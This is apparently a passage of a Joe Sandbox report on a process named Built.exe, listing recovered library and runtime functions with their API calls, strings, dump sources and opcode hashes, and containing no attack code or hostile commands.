API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
String ID: [oV116
API String ID: 838830666-247592185
Opcode ID: 61b5c28cf5bd54c0d1955ea908dddf651f529a3252d172ecfc0f9d2d94de35d5
Instruction ID: 00dd7116cfe842481b09f830a02937769c925462c31f1b0954c2153e75ef1365
Opcode Fuzzy Hash: 61b5c28cf5bd54c0d1955ea908dddf651f529a3252d172ecfc0f9d2d94de35d5
Instruction Fuzzy Hash: B121C534A2CB02C1EB50BB14F951375A665FB98385FD40139DD8E87BA2FF7DA4448B20

Function 00007FF76D5DFA4C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DFA7C
GetDriveTypeW.KERNEL32 ref: 00007FF76D5DFABC

Strings

:, xrefs: 00007FF76D5DFAA5
[oV116, xrefs: 00007FF76D5DFA52

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :$[oV116
API String ID: 2595371189-4125022217
Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction ID: 2ca4c2416d58bd2da2ab7b83c69facbe00a37a498a66a248d97292ae586a73ec
Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction Fuzzy Hash: E401212192C246C6FB20BF64A47127EA2A0EF98748FC41035DD5D86A92FE7CD544CA39

Function 00007FFDF75C5A30 Relevance: 6.5, Strings: 5, Instructions: 278COMMON

Download Yara Rule

Strings

API called with finalized prepared statement, xrefs: 00007FFDF75C5A61
df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24, xrefs: 00007FFDF75C5A80
%s at line %d of [%.10s], xrefs: 00007FFDF75C5A99
misuse, xrefs: 00007FFDF75C5A8D
API called with NULL prepared statement, xrefs: 00007FFDF75C5A4B

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24$misuse
API String ID: 0-1807708480
Opcode ID: 7361e034c5f3c065c3ffd55b5c74443cd79c86dfaea71e7c77c4f61fd9c4d99e
Instruction ID: 485dd08316c14f2fa5cc63fbf6c54d7bf1143194305f42a0baf7d6277fbc3d00
Opcode Fuzzy Hash: 7361e034c5f3c065c3ffd55b5c74443cd79c86dfaea71e7c77c4f61fd9c4d99e
Instruction Fuzzy Hash: CBE15126F09BC581E7568B3895147FC6360FBA9B88F259235DF9C17396EF38A1D58300

Function 00007FF76D5DC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5DC25B), ref: 00007FF76D5DC38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5DC25B), ref: 00007FF76D5DC417

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
Instruction ID: 458f2ce71b43a27e06bc881334e9649ee0d8683f66b9631d7c4f1d92e81d0303
Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
Instruction Fuzzy Hash: 1591E632F2C652C5F760EF6594602BDABA0BB08B89F944139DE1E56E86EF38D441C734

Function 00007FF76D5C2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF76D5C2064
SetWindowLongPtrW.USER32 ref: 00007FF76D5C2086
GetWindowLongPtrW.USER32 ref: 00007FF76D5C20B0
InvalidateRect.USER32 ref: 00007FF76D5C20D0

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: 80d1beb9ce618d1b8a3ef159b9948ece14119529072c8ea31644ced54649c984
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: DB118A21A2C242C1FB65BB5AE545379A252EF88B81FC49135DE4906F9BDD3DD4818930

Function 00007FFDF715177B Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 445COMMON

Download Yara Rule

Strings

..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFDF7193ACD
, xrefs: 00007FFDF71934A2

Memory Dump Source

Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true

Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd

Similarity

API ID:
String ID: $..\s\ssl\statem\extensions_srvr.c
API String ID: 0-1533168471
Opcode ID: 3a3098dfb846c9c121a9c1ce49b31b97a850979f605987c42cedba07d40a0cf7
Instruction ID: c99d54f6b8585769e803f59737ed2b5f5f5e9220240747a5215dbb41d5181c0c
Opcode Fuzzy Hash: 3a3098dfb846c9c121a9c1ce49b31b97a850979f605987c42cedba07d40a0cf7
Instruction Fuzzy Hash: FA12B567F1868242FB249E21D465BFE67A1EB80B88F446035DA6D866CDDF3CE64DC700

Function 00007FFDF7152004 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 246COMMON

Download Yara Rule

APIs

00007FFE13301210.VCRUNTIME140 ref: 00007FFDF7185762
00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDF71857B4

Strings

..\s\ssl\ssl_sess.c, xrefs: 00007FFDF718578E, 00007FFDF71858A0

Memory Dump Source

Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true

Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd

Similarity

API ID: 00007$E13301210
String ID: ..\s\ssl\ssl_sess.c
API String ID: 214908505-2868363209
Opcode ID: ab109126bee30d2ec08c4dc11c06369e4797c85e910cf8a983de278d297afffd
Instruction ID: fecac81c5e0961ad71e4cc94d3df11f11d4a18364d04ae035700ba0cfa7a7aeb
Opcode Fuzzy Hash: ab109126bee30d2ec08c4dc11c06369e4797c85e910cf8a983de278d297afffd
Instruction Fuzzy Hash: 23C17C3BF0868286EB658B16D560BE933A0FB84B88F14A135EE5D477D9DF39E449C700

Function 00007FF76D5E197C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5E12D4: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF76D5E1610), ref: 00007FF76D5E12FE

IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF76D5E1741), ref: 00007FF76D5E19E9
GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF76D5E1741), ref: 00007FF76D5E1A2D

Strings

[oV116, xrefs: 00007FF76D5E1992

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: [oV116
API String ID: 546120528-247592185
Opcode ID: e63c6c68172dbc7893da588430885f5c2570785f87c2278c930a00c0814f328b
Instruction ID: 1ee9ed9f20b53ed7eab1648a6966a823142f64864617f6d6888a347a4c288a26
Opcode Fuzzy Hash: e63c6c68172dbc7893da588430885f5c2570785f87c2278c930a00c0814f328b
Instruction Fuzzy Hash: CA81B462A2C682C6E765BF26A044579F7A5EB58780FC84035CE8E47E92FE3CF541C760

Function 00007FFDF7152040 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF7157632

Strings

H, xrefs: 00007FFDF715756B
..\s\ssl\d1_srtp.c, xrefs: 00007FFDF7157573, 00007FFDF7157654

Memory Dump Source

Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true

Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\d1_srtp.c$H
API String ID: 4069847057-1001428523
Opcode ID: fb930fba680c5a720dae2e7a20aef1e6e810cd35922df4da2ba3306aa5a611b6
Instruction ID: 3ec74f0471234e1151247a14f5042210eb218d34536966da1b6011a01d29bd58
Opcode Fuzzy Hash: fb930fba680c5a720dae2e7a20aef1e6e810cd35922df4da2ba3306aa5a611b6
Instruction Fuzzy Hash: F241C32BF1D24289FB199B29A421BFA5691AF48B80F546431ED2D877CDDF3CE54E8700

Function 00007FF76D5E13EC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF76D5E142E

Strings

, xrefs: 00007FF76D5E1471
[oV116, xrefs: 00007FF76D5E1406

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Info
String ID: $[oV116
API String ID: 1807457897-413529578
Opcode ID: 303d47dc9d7a462e28912bc7ff4cfd28ceca2aa4ad540973da8af8c9648a8d3d
Instruction ID: 38e11d45733a7ba856060eda241ad14002d14eac341bd76ed233687d2f9edce7
Opcode Fuzzy Hash: 303d47dc9d7a462e28912bc7ff4cfd28ceca2aa4ad540973da8af8c9648a8d3d
Instruction Fuzzy Hash: A2519372A2C7C1C6E721AF24E0847ADB7A0F748744F944136DB8E47A86EB7CD545CB60

Function 00007FF76D5E4E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5E0A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E0AA3

_get_daylight.LIBCMT ref: 00007FF76D5E4F44
_get_daylight.LIBCMT ref: 00007FF76D5E4F55

Strings

?, xrefs: 00007FF76D5E4ED5

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
Instruction ID: 5b24d7d7d8e1809f1cd3ac0a373fdfb3f1329f035c4cc1df6e93142e161c2ac6
Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
Instruction Fuzzy Hash: 4E41D822A2C682C6FB64BB25941177AD750EF8DBA4F944235EE6C06ED6FF3CD4818710

Function 00007FF76D5E2150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32 ref: 00007FF76D5E2282

Strings

[oV116, xrefs: 00007FF76D5E216F
verbose, xrefs: 00007FF76D5E2152

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: StringType
String ID: [oV116$verbose
API String ID: 4177115715-2993820990
Opcode ID: c096a06b8cd5c460450c28d262d2bd2cc08537fd5ffa77b441f85804865d824d
Instruction ID: 00bad93620f2b2dc71f9bd9a093b3045b31b6d56df67c3dbfc71598bdcc66e7b
Opcode Fuzzy Hash: c096a06b8cd5c460450c28d262d2bd2cc08537fd5ffa77b441f85804865d824d
Instruction Fuzzy Hash: B3417762A1864285EB646E21D8007A9A291FB487A8F984535EE5D47FDAEF3CD4418320

Function 00007FF76D5D832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D835E

Part of subcall function 00007FF76D5D9C58: HeapFree.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF76D5CBEC5), ref: 00007FF76D5D837C

Strings

C:\Users\user\AppData\Local\Temp\Built.exe, xrefs: 00007FF76D5D836A

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\Built.exe
API String ID: 3580290477-3074098987
Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
Instruction ID: 4264282602f076345a22c95d98c3d56f1b3de88ff10150415223d461c1dbb03d
Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
Instruction Fuzzy Hash: B7419E32A2CA52C5E724FF2598611BCA794EB487C4B855035EE2D03B86EE3CE480C334

Function 00007FF76D5DBE2C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF76D5DBEF6
GetLastError.KERNEL32 ref: 00007FF76D5DBF12

Strings

[oV116, xrefs: 00007FF76D5DBE47

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: [oV116
API String ID: 442123175-247592185
Opcode ID: dcf434cc05848051654b827cd9a301ac8e3be28b5d08f60baa7fbca5dd2ecce2
Instruction ID: cc6e83006446489d4947ceaabfcd501004732ba21c5bd327c3a260f918c0097a
Opcode Fuzzy Hash: dcf434cc05848051654b827cd9a301ac8e3be28b5d08f60baa7fbca5dd2ecce2
Instruction Fuzzy Hash: 2031B172B29A42C6DB20BF15E4802A9A3B1FB58784F844435EF5D87B56EF3CD451CB24

Function 00007FF76D5D4F14 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32 ref: 00007FF76D5D4FD7

Strings

./\, xrefs: 00007FF76D5D4F3B
[oV116, xrefs: 00007FF76D5D4F29

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: DriveType
String ID: ./\$[oV116
API String ID: 338552980-1764669499
Opcode ID: 27a464a6fde7d61cd9f6e5bcdfb95c6e340156c29a74087914564c7ab83c7f7e
Instruction ID: 096fdb51eacc172927ef4cd94eca1d8ec4ed1155b4d4c97f60efe073cb8e9e6a
Opcode Fuzzy Hash: 27a464a6fde7d61cd9f6e5bcdfb95c6e340156c29a74087914564c7ab83c7f7e
Instruction Fuzzy Hash: B5218F21A2C683C5EA60BF1594212BDA250AF99790FC95130EE3D17BD3EE3CE4418738

Function 00007FF76D5DBD28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF76D5DBDDB
GetLastError.KERNEL32 ref: 00007FF76D5DBDF7

Strings

[oV116, xrefs: 00007FF76D5DBD43

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: [oV116
API String ID: 442123175-247592185
Opcode ID: d7f8f287b1e63e7b63fa21a4db5d8b560d2b642b394443e798d6f697f82f448f
Instruction ID: 99f7cca1191d9f92dbd095bcab0f511c42674a12f7127843c6f6810f9975275d
Opcode Fuzzy Hash: d7f8f287b1e63e7b63fa21a4db5d8b560d2b642b394443e798d6f697f82f448f
Instruction Fuzzy Hash: A731C232A2CB85CADB10BF15E4402A9B771FB18780F844032DE5D83B16EE3CD451CB24

Function 00007FFDF7183EC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

Strings

T, xrefs: 00007FFDF7183F78
..\s\ssl\ssl_sess.c, xrefs: 00007FFDF7183EEF, 00007FFDF7183F08, 00007FFDF7183F71, 00007FFDF7183FC3

Memory Dump Source

Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true

Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_sess.c$T
API String ID: 0-2647723609
Opcode ID: 5880672ac5d53579d539c506b9ea1cefb64f0d00ca576262034d82b874cbd273
Instruction ID: 858c6aedd9fd6412faa92cea9d55069202450b4bd2e1dd0ac081aa565c98dd08
Opcode Fuzzy Hash: 5880672ac5d53579d539c506b9ea1cefb64f0d00ca576262034d82b874cbd273
Instruction Fuzzy Hash: 55216F3AF1864282FB449B65D865BEA66A0EF44744F88503AEA1C477C9EF3DE50DCB01

Function 00007FF76D5C40A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

